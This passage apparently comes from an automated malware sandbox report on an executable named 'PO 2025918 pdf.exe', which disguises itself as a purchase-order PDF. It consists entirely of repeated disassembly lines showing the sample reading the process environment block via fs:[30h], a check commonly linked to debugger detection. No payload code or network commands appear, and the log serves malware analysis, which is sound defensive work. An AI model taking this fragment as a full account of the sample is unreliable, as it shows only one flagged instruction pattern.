                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B245A mov eax, dword ptr fs:[00000030h]5_2_016B245A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168645D mov eax, dword ptr fs:[00000030h]5_2_0168645D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E420 mov eax, dword ptr fs:[00000030h]5_2_0168E420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E420 mov eax, dword ptr fs:[00000030h]5_2_0168E420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E420 mov eax, dword ptr fs:[00000030h]5_2_0168E420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168C427 mov eax, dword ptr fs:[00000030h]5_2_0168C427
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA430 mov eax, dword ptr fs:[00000030h]5_2_016CA430
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8402 mov eax, dword ptr fs:[00000030h]5_2_016C8402
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8402 mov eax, dword ptr fs:[00000030h]5_2_016C8402
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8402 mov eax, dword ptr fs:[00000030h]5_2_016C8402
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016904E5 mov ecx, dword ptr fs:[00000030h]5_2_016904E5
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171A4B0 mov eax, dword ptr fs:[00000030h]5_2_0171A4B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016964AB mov eax, dword ptr fs:[00000030h]5_2_016964AB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C44B0 mov ecx, dword ptr fs:[00000030h]5_2_016C44B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698770 mov eax, dword ptr fs:[00000030h]5_2_01698770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C674D mov esi, dword ptr fs:[00000030h]5_2_016C674D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C674D mov eax, dword ptr fs:[00000030h]5_2_016C674D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C674D mov eax, dword ptr fs:[00000030h]5_2_016C674D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01714755 mov eax, dword ptr fs:[00000030h]5_2_01714755
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171E75D mov eax, dword ptr fs:[00000030h]5_2_0171E75D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690750 mov eax, dword ptr fs:[00000030h]5_2_01690750
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2750 mov eax, dword ptr fs:[00000030h]5_2_016D2750
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2750 mov eax, dword ptr fs:[00000030h]5_2_016D2750
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170C730 mov eax, dword ptr fs:[00000030h]5_2_0170C730
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC720 mov eax, dword ptr fs:[00000030h]5_2_016CC720
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC720 mov eax, dword ptr fs:[00000030h]5_2_016CC720
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C273C mov eax, dword ptr fs:[00000030h]5_2_016C273C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C273C mov ecx, dword ptr fs:[00000030h]5_2_016C273C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C273C mov eax, dword ptr fs:[00000030h]5_2_016C273C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC700 mov eax, dword ptr fs:[00000030h]5_2_016CC700
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690710 mov eax, dword ptr fs:[00000030h]5_2_01690710
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C0710 mov eax, dword ptr fs:[00000030h]5_2_016C0710
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B27ED mov eax, dword ptr fs:[00000030h]5_2_016B27ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B27ED mov eax, dword ptr fs:[00000030h]5_2_016B27ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B27ED mov eax, dword ptr fs:[00000030h]5_2_016B27ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171E7E1 mov eax, dword ptr fs:[00000030h]5_2_0171E7E1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016947FB mov eax, dword ptr fs:[00000030h]5_2_016947FB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016947FB mov eax, dword ptr fs:[00000030h]5_2_016947FB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169C7C0 mov eax, dword ptr fs:[00000030h]5_2_0169C7C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017107C3 mov eax, dword ptr fs:[00000030h]5_2_017107C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016907AF mov eax, dword ptr fs:[00000030h]5_2_016907AF
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173678E mov eax, dword ptr fs:[00000030h]5_2_0173678E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA660 mov eax, dword ptr fs:[00000030h]5_2_016CA660
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA660 mov eax, dword ptr fs:[00000030h]5_2_016CA660
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C2674 mov eax, dword ptr fs:[00000030h]5_2_016C2674
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175866E mov eax, dword ptr fs:[00000030h]5_2_0175866E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175866E mov eax, dword ptr fs:[00000030h]5_2_0175866E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AC640 mov eax, dword ptr fs:[00000030h]5_2_016AC640
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169262C mov eax, dword ptr fs:[00000030h]5_2_0169262C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C6620 mov eax, dword ptr fs:[00000030h]5_2_016C6620
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8620 mov eax, dword ptr fs:[00000030h]5_2_016C8620
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE627 mov eax, dword ptr fs:[00000030h]5_2_016AE627
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2619 mov eax, dword ptr fs:[00000030h]5_2_016D2619
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E609 mov eax, dword ptr fs:[00000030h]5_2_0170E609
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017106F1 mov eax, dword ptr fs:[00000030h]5_2_017106F1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017106F1 mov eax, dword ptr fs:[00000030h]5_2_017106F1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E6F2 mov eax, dword ptr fs:[00000030h]5_2_0170E6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E6F2 mov eax, dword ptr fs:[00000030h]5_2_0170E6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E6F2 mov eax, dword ptr fs:[00000030h]5_2_0170E6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E6F2 mov eax, dword ptr fs:[00000030h]5_2_0170E6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA6C7 mov ebx, dword ptr fs:[00000030h]5_2_016CA6C7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA6C7 mov eax, dword ptr fs:[00000030h]5_2_016CA6C7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC6A6 mov eax, dword ptr fs:[00000030h]5_2_016CC6A6
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C66B0 mov eax, dword ptr fs:[00000030h]5_2_016C66B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694690 mov eax, dword ptr fs:[00000030h]5_2_01694690
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694690 mov eax, dword ptr fs:[00000030h]5_2_01694690
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D096E mov eax, dword ptr fs:[00000030h]5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D096E mov edx, dword ptr fs:[00000030h]5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D096E mov eax, dword ptr fs:[00000030h]5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B6962 mov eax, dword ptr fs:[00000030h]5_2_016B6962
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B6962 mov eax, dword ptr fs:[00000030h]5_2_016B6962
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B6962 mov eax, dword ptr fs:[00000030h]5_2_016B6962
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01734978 mov eax, dword ptr fs:[00000030h]5_2_01734978
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01734978 mov eax, dword ptr fs:[00000030h]5_2_01734978
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171C97C mov eax, dword ptr fs:[00000030h]5_2_0171C97C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01710946 mov eax, dword ptr fs:[00000030h]5_2_01710946
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0172892B mov eax, dword ptr fs:[00000030h]5_2_0172892B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171892A mov eax, dword ptr fs:[00000030h]5_2_0171892A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171C912 mov eax, dword ptr fs:[00000030h]5_2_0171C912
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01688918 mov eax, dword ptr fs:[00000030h]5_2_01688918
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01688918 mov eax, dword ptr fs:[00000030h]5_2_01688918
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E908 mov eax, dword ptr fs:[00000030h]5_2_0170E908
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E908 mov eax, dword ptr fs:[00000030h]5_2_0170E908
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171E9E0 mov eax, dword ptr fs:[00000030h]5_2_0171E9E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C29F9 mov eax, dword ptr fs:[00000030h]5_2_016C29F9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C29F9 mov eax, dword ptr fs:[00000030h]5_2_016C29F9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175A9D3 mov eax, dword ptr fs:[00000030h]5_2_0175A9D3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017269C0 mov eax, dword ptr fs:[00000030h]5_2_017269C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A9D0 mov eax, dword ptr fs:[00000030h]5_2_0169A9D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A9D0 mov eax, dword ptr fs:[00000030h]5_2_0169A9D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A9D0 mov eax, dword ptr fs:[00000030h]5_2_0169A9D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A9D0 mov eax, dword ptr fs:[00000030h]5_2_0169A9D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A9D0 mov eax, dword ptr fs:[00000030h]5_2_0169A9D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A9D0 mov eax, dword ptr fs:[00000030h]5_2_0169A9D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C49D0 mov eax, dword ptr fs:[00000030h]5_2_016C49D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017189B3 mov esi, dword ptr fs:[00000030h]5_2_017189B3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017189B3 mov eax, dword ptr fs:[00000030h]5_2_017189B3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017189B3 mov eax, dword ptr fs:[00000030h]5_2_017189B3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016909AD mov eax, dword ptr fs:[00000030h]5_2_016909AD
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016909AD mov eax, dword ptr fs:[00000030h]5_2_016909AD
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A29A0 mov eax, dword ptr fs:[00000030h]5_2_016A29A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01726870 mov eax, dword ptr fs:[00000030h]5_2_01726870
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01726870 mov eax, dword ptr fs:[00000030h]5_2_01726870
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171E872 mov eax, dword ptr fs:[00000030h]5_2_0171E872
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171E872 mov eax, dword ptr fs:[00000030h]5_2_0171E872
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A2840 mov ecx, dword ptr fs:[00000030h]5_2_016A2840
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694859 mov eax, dword ptr fs:[00000030h]5_2_01694859
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694859 mov eax, dword ptr fs:[00000030h]5_2_01694859
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C0854 mov eax, dword ptr fs:[00000030h]5_2_016C0854
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173483A mov eax, dword ptr fs:[00000030h]5_2_0173483A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173483A mov eax, dword ptr fs:[00000030h]5_2_0173483A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA830 mov eax, dword ptr fs:[00000030h]5_2_016CA830
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B2835 mov eax, dword ptr fs:[00000030h]5_2_016B2835
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B2835 mov eax, dword ptr fs:[00000030h]5_2_016B2835
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B2835 mov eax, dword ptr fs:[00000030h]5_2_016B2835
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B2835 mov ecx, dword ptr fs:[00000030h]5_2_016B2835
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B2835 mov eax, dword ptr fs:[00000030h]5_2_016B2835
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B2835 mov eax, dword ptr fs:[00000030h]5_2_016B2835
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171C810 mov eax, dword ptr fs:[00000030h]5_2_0171C810
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175A8E4 mov eax, dword ptr fs:[00000030h]5_2_0175A8E4
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC8F9 mov eax, dword ptr fs:[00000030h]5_2_016CC8F9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC8F9 mov eax, dword ptr fs:[00000030h]5_2_016CC8F9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE8C0 mov eax, dword ptr fs:[00000030h]5_2_016BE8C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171C89D mov eax, dword ptr fs:[00000030h]5_2_0171C89D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690887 mov eax, dword ptr fs:[00000030h]5_2_01690887
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168CB7E mov eax, dword ptr fs:[00000030h]5_2_0168CB7E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01738B42 mov eax, dword ptr fs:[00000030h]5_2_01738B42
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01726B40 mov eax, dword ptr fs:[00000030h]5_2_01726B40
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01726B40 mov eax, dword ptr fs:[00000030h]5_2_01726B40
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175AB40 mov eax, dword ptr fs:[00000030h]5_2_0175AB40
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BEB20 mov eax, dword ptr fs:[00000030h]5_2_016BEB20
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BEB20 mov eax, dword ptr fs:[00000030h]5_2_016BEB20
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01758B28 mov eax, dword ptr fs:[00000030h]5_2_01758B28
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01758B28 mov eax, dword ptr fs:[00000030h]5_2_01758B28
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170EB1D mov eax, dword ptr fs:[00000030h]5_2_0170EB1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171CBF0 mov eax, dword ptr fs:[00000030h]5_2_0171CBF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BEBFC mov eax, dword ptr fs:[00000030h]5_2_016BEBFC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698BF0 mov eax, dword ptr fs:[00000030h]5_2_01698BF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698BF0 mov eax, dword ptr fs:[00000030h]5_2_01698BF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698BF0 mov eax, dword ptr fs:[00000030h]5_2_01698BF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B0BCB mov eax, dword ptr fs:[00000030h]5_2_016B0BCB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B0BCB mov eax, dword ptr fs:[00000030h]5_2_016B0BCB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B0BCB mov eax, dword ptr fs:[00000030h]5_2_016B0BCB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173EBD0 mov eax, dword ptr fs:[00000030h]5_2_0173EBD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690BCD mov eax, dword ptr fs:[00000030h]5_2_01690BCD
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690BCD mov eax, dword ptr fs:[00000030h]5_2_01690BCD
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690BCD mov eax, dword ptr fs:[00000030h]5_2_01690BCD
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0BBE mov eax, dword ptr fs:[00000030h]5_2_016A0BBE
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0BBE mov eax, dword ptr fs:[00000030h]5_2_016A0BBE
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170CA72 mov eax, dword ptr fs:[00000030h]5_2_0170CA72
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170CA72 mov eax, dword ptr fs:[00000030h]5_2_0170CA72
